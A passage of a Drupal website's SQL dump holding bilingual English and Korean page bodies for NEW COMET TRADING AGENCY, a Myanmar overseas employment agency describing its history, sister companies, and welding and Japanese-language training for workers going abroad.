style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 88, 'ja', 0, '<p>Coming Soon....</p>', '', 'full_html'),
('page', 0, 1, 88, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 144, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>안녕하세요.우리\"뉴코멧 영업 대행사\" 웹사이트 에서 환영합니다.</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun 